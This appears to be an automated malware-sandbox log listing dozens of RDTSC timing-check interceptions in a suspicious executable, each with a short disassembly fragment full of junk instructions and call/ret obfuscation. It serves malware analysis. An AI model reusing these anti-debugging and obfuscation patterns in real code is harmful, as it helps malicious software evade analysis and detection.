Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 181BDCC second address: 181BE03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C3188h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7B216C3185h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 181FBBC second address: 181FBC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 181F021 second address: 181F025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 181F025 second address: 181F039 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F7B212E85CBh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18211D6 second address: 18211F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F7B216C317Dh 0x0000000c jl 00007F7B216C3176h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17E5004 second address: 17E500E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17E500E second address: 17E5014 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1825B83 second address: 1825B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1826159 second address: 1826163 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 182622A second address: 1826251 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F7B212E85CFh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1826251 second address: 182625B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F7B216C3176h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18266C4 second address: 18266CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1826833 second address: 1826839 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1826839 second address: 182683D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 182683D second address: 1826850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007F7B216C3178h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18268F6 second address: 18268FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18268FA second address: 18268FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18268FE second address: 1826904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1826904 second address: 1826914 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7B216C317Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1826914 second address: 1826920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1826920 second address: 1826926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1826CDB second address: 1826CDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1826DDA second address: 1826DDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1826DDE second address: 1826DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18272ED second address: 18272F3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18272F3 second address: 18272F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18272F9 second address: 1827341 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d sub dword ptr [ebp+129C1AE6h], edx 0x00000013 movzx esi, cx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F7B216C3178h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Dh 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 push esi 0x00000033 mov si, dx 0x00000036 pop edi 0x00000037 push eax 0x00000038 push edi 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1827341 second address: 1827345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1827C66 second address: 1827C8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C317Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7B216C3185h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1827C8F second address: 1827C95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1827C95 second address: 1827C9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F7B216C3176h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18297FE second address: 1829812 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jnp 00007F7B212E85C6h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1829812 second address: 1829818 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1829568 second address: 182956C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 182956C second address: 1829576 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7B216C3176h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 182A260 second address: 182A266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 182A266 second address: 182A2EB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7B216C317Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+129C37B8h], esi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F7B216C3178h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d jmp 00007F7B216C3188h 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+129C1CD2h], edi 0x0000003a add dword ptr [ebp+129C288Bh], eax 0x00000040 xchg eax, ebx 0x00000041 pushad 0x00000042 jmp 00007F7B216C317Eh 0x00000047 pushad 0x00000048 pushad 0x00000049 popad 0x0000004a push ebx 0x0000004b pop ebx 0x0000004c popad 0x0000004d popad 0x0000004e push eax 0x0000004f pushad 0x00000050 jl 00007F7B216C317Ch 0x00000056 jl 00007F7B216C3176h 0x0000005c pushad 0x0000005d pushad 0x0000005e popad 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 182AC86 second address: 182AC8C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 182AC8C second address: 182AC92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 182AC92 second address: 182AC96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 182AC96 second address: 182AD11 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F7B216C3178h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 0000001Ch 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 mov esi, dword ptr [ebp+129C383Bh] 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007F7B216C3178h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 0000001Dh 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 push 00000000h 0x00000049 jmp 00007F7B216C3183h 0x0000004e xchg eax, ebx 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 jne 00007F7B216C3176h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 182AD11 second address: 182AD15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 182B96A second address: 182B96E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 182E2EC second address: 182E2F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F7B212E85C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 183066E second address: 1830672 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 183159B second address: 18315B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18315B2 second address: 18315EC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7B216C3189h 0x00000008 jmp 00007F7B216C3183h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 mov ebx, dword ptr [ebp+129C2872h] 0x00000016 push 00000000h 0x00000018 sub ebx, 0E16A533h 0x0000001e push 00000000h 0x00000020 mov ebx, dword ptr [ebp+129C381Bh] 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18315EC second address: 18315F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18315F1 second address: 18315FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F7B216C3176h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 183243B second address: 183243F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 183243F second address: 18324C2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jp 00007F7B216C3176h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F7B216C3178h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 mov bx, si 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007F7B216C3178h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 00000017h 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 push 00000000h 0x0000004a push 00000000h 0x0000004c push ecx 0x0000004d call 00007F7B216C3178h 0x00000052 pop ecx 0x00000053 mov dword ptr [esp+04h], ecx 0x00000057 add dword ptr [esp+04h], 00000015h 0x0000005f inc ecx 0x00000060 push ecx 0x00000061 ret 0x00000062 pop ecx 0x00000063 ret 0x00000064 jmp 00007F7B216C317Ch 0x00000069 push eax 0x0000006a push edi 0x0000006b push ecx 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18344E8 second address: 18344FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18344FA second address: 1834500 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 182E5B8 second address: 182E5BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 182E5BC second address: 182E5C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 182F720 second address: 182F726 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 182F726 second address: 182F72B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 182F72B second address: 182F7AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a stc 0x0000000b push dword ptr fs:[00000000h] 0x00000012 jnl 00007F7B212E85C9h 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f push 00000000h 0x00000021 push ebx 0x00000022 call 00007F7B212E85C8h 0x00000027 pop ebx 0x00000028 mov dword ptr [esp+04h], ebx 0x0000002c add dword ptr [esp+04h], 0000001Bh 0x00000034 inc ebx 0x00000035 push ebx 0x00000036 ret 0x00000037 pop ebx 0x00000038 ret 0x00000039 mov eax, dword ptr [ebp+129C0B45h] 0x0000003f push 00000000h 0x00000041 push ecx 0x00000042 call 00007F7B212E85C8h 0x00000047 pop ecx 0x00000048 mov dword ptr [esp+04h], ecx 0x0000004c add dword ptr [esp+04h], 00000017h 0x00000054 inc ecx 0x00000055 push ecx 0x00000056 ret 0x00000057 pop ecx 0x00000058 ret 0x00000059 push FFFFFFFFh 0x0000005b jl 00007F7B212E85CBh 0x00000061 push eax 0x00000062 movzx edi, dx 0x00000065 pop edi 0x00000066 nop 0x00000067 push esi 0x00000068 push eax 0x00000069 push edx 0x0000006a jno 00007F7B212E85C6h 0x00000070 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 182F7AC second address: 182F7B9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18375D1 second address: 183765D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007F7B212E85C8h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 mov dword ptr [ebp+129C2937h], ebx 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edx 0x0000002e call 00007F7B212E85C8h 0x00000033 pop edx 0x00000034 mov dword ptr [esp+04h], edx 0x00000038 add dword ptr [esp+04h], 0000001Dh 0x00000040 inc edx 0x00000041 push edx 0x00000042 ret 0x00000043 pop edx 0x00000044 ret 0x00000045 mov ebx, dword ptr [ebp+129C3AF3h] 0x0000004b or edi, dword ptr [ebp+129C39F7h] 0x00000051 push 00000000h 0x00000053 jmp 00007F7B212E85CFh 0x00000058 xchg eax, esi 0x00000059 push eax 0x0000005a push edx 0x0000005b jmp 00007F7B212E85D9h 0x00000060 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 183765D second address: 183766E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1839C82 second address: 1839C98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F7B212E85CCh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1839C98 second address: 1839CAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7B216C317Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1839CAC second address: 1839CDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 movzx edi, ax 0x0000000b push 00000000h 0x0000000d mov ebx, dword ptr [ebp+12B45787h] 0x00000013 mov dword ptr [ebp+129C1835h], ebx 0x00000019 push 00000000h 0x0000001b mov edi, dword ptr [ebp+129C3B23h] 0x00000021 mov edi, edx 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jo 00007F7B212E85CCh 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1839CDA second address: 1839CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18317CA second address: 18317D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F7B212E85C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 183CCAF second address: 183CCB9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F7B216C3176h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1832625 second address: 1832629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1833603 second address: 1833609 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18345DD second address: 18345E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18345E1 second address: 18345E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1833609 second address: 183364F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7B212E85CCh 0x00000008 jg 00007F7B212E85C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 movsx edi, dx 0x00000014 push dword ptr fs:[00000000h] 0x0000001b sub dword ptr [ebp+12B543EAh], edi 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 mov eax, dword ptr [ebp+129C1441h] 0x0000002e push ecx 0x0000002f push edi 0x00000030 mov dword ptr [ebp+129C24D7h], eax 0x00000036 pop ebx 0x00000037 pop edi 0x00000038 push FFFFFFFFh 0x0000003a mov ebx, dword ptr [ebp+129C2855h] 0x00000040 push eax 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18345E7 second address: 18345ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 183DDCF second address: 183DDD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 183DDD3 second address: 183DE58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C3182h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b sub dword ptr [ebp+129C285Dh], ebx 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F7B216C3178h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d jmp 00007F7B216C317Ah 0x00000032 xor edi, dword ptr [ebp+129C39D7h] 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ebp 0x0000003d call 00007F7B216C3178h 0x00000042 pop ebp 0x00000043 mov dword ptr [esp+04h], ebp 0x00000047 add dword ptr [esp+04h], 0000001Dh 0x0000004f inc ebp 0x00000050 push ebp 0x00000051 ret 0x00000052 pop ebp 0x00000053 ret 0x00000054 add dword ptr [ebp+129C285Dh], eax 0x0000005a xchg eax, esi 0x0000005b jp 00007F7B216C3184h 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 183DE58 second address: 183DE81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7B212E85C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e ja 00007F7B212E85DBh 0x00000014 jmp 00007F7B212E85D5h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18346F4 second address: 18346F9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
